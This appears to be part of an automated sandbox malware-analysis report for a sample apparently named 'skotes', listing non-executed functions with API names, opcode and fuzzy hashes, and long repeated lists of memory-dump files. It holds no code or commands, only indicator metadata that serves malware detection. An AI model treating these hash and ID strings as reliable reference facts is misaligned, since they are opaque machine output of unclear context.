                                                                                                                                                                    • Instruction ID: a20b635a4f55d7326279fe49ee08a056e2b698e7ccbeab299f331ac107e2ca20
                                                                                                                                                                    • Opcode Fuzzy Hash: 98ccb398826eb31bc7dce089197b4160725de904ea25b186134db354612d18f9
                                                                                                                                                                    • Instruction Fuzzy Hash: D2F0E232E456246EEB213A729C01BBF375B9F91770B288025FC08AB291DA20EC0186E0

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 0064CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                    • String ID: vd
                                                                                                                                                                    • API String ID: 3213747228-3616272301
                                                                                                                                                                    • Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                    • Instruction ID: a460c0b09a48e37c6ee6a9d3c2e6fdbd8bcf807612c28d6bbace3128253b6885
                                                                                                                                                                    • Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                    • Instruction Fuzzy Hash: 20B10232D066459FDB55CF28C881BEEBBE7EF45360F1441AAE855EB341D6348D02CBA4
                                                                                                                                                                    Function 00612EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 32384418-0
                                                                                                                                                                    • Opcode ID: 9164bf77744288e150209721828d7f16bd5e822fb2be1a500afcdccee2ca71b1
                                                                                                                                                                    • Instruction ID: b7405b99c402927f77947860a41ba0b3e575ce6ff365c6ed10a7dddbe51b4276
                                                                                                                                                                    • Opcode Fuzzy Hash: 9164bf77744288e150209721828d7f16bd5e822fb2be1a500afcdccee2ca71b1
                                                                                                                                                                    • Instruction Fuzzy Hash: 78A1F270901A26EFDB10DF64D9457DAB7EAFF19320F188129E816D7341EB31EA84CB91
                                                                                                                                                                    Function 0062BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 531285432-0
                                                                                                                                                                    • Opcode ID: 58fd67c4c11203932cf14b05111fb7094349591e679eb1b5a4820c573e917f48
                                                                                                                                                                    • Instruction ID: 544551bdc226d239f300b9b3947630fadadfc86e669365350b3237f1a9ad1a81
                                                                                                                                                                    • Opcode Fuzzy Hash: 58fd67c4c11203932cf14b05111fb7094349591e679eb1b5a4820c573e917f48
                                                                                                                                                                    • Instruction Fuzzy Hash: E9213271A00529AFDF40EFA4ED819BEB7BAEF08720F101029F901B7251DB709D419FA4
                                                                                                                                                                    Function 0064F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.2201284335.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.2201268314.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201284335.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201342130.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201357651.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201375774.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201391233.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201406760.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201501926.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201517377.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201535767.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201576961.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201592349.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201609506.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201624389.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201642852.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201658183.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201674810.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201691038.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201713822.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201730381.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201748148.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201763640.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201781002.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201797911.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201819693.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201837561.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201853263.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201869733.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201890329.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201909411.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201926932.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201945622.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201964865.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2201987520.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202011077.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202029385.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202048430.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202066009.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202103752.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202125569.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202170722.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202194145.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202214902.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202233288.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202255316.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202277857.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.2202298926.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ___free_lconv_mon
                                                                                                                                                                    • String ID: 8"g$`'g
                                                                                                                                                                    • API String ID: 3903695350-151162620
                                                                                                                                                                    • Opcode ID: 8006c1cbe04065090410a99767146c77c67963709850ba2cc05367a8a9fd8417
                                                                                                                                                                    • Instruction ID: 54d7d7944e58c16dcaffaa2bb04a10d0618e493d9590c52a280c8a87ccc0f0a1
                                                                                                                                                                    • Opcode Fuzzy Hash: 8006c1cbe04065090410a99767146c77c67963709850ba2cc05367a8a9fd8417
                                                                                                                                                                    • Instruction Fuzzy Hash: 74315A32A00201EFEB61AF79D845B9B73EBEF04352F10442DF049D7696DE70AC808B59

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:1.1%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
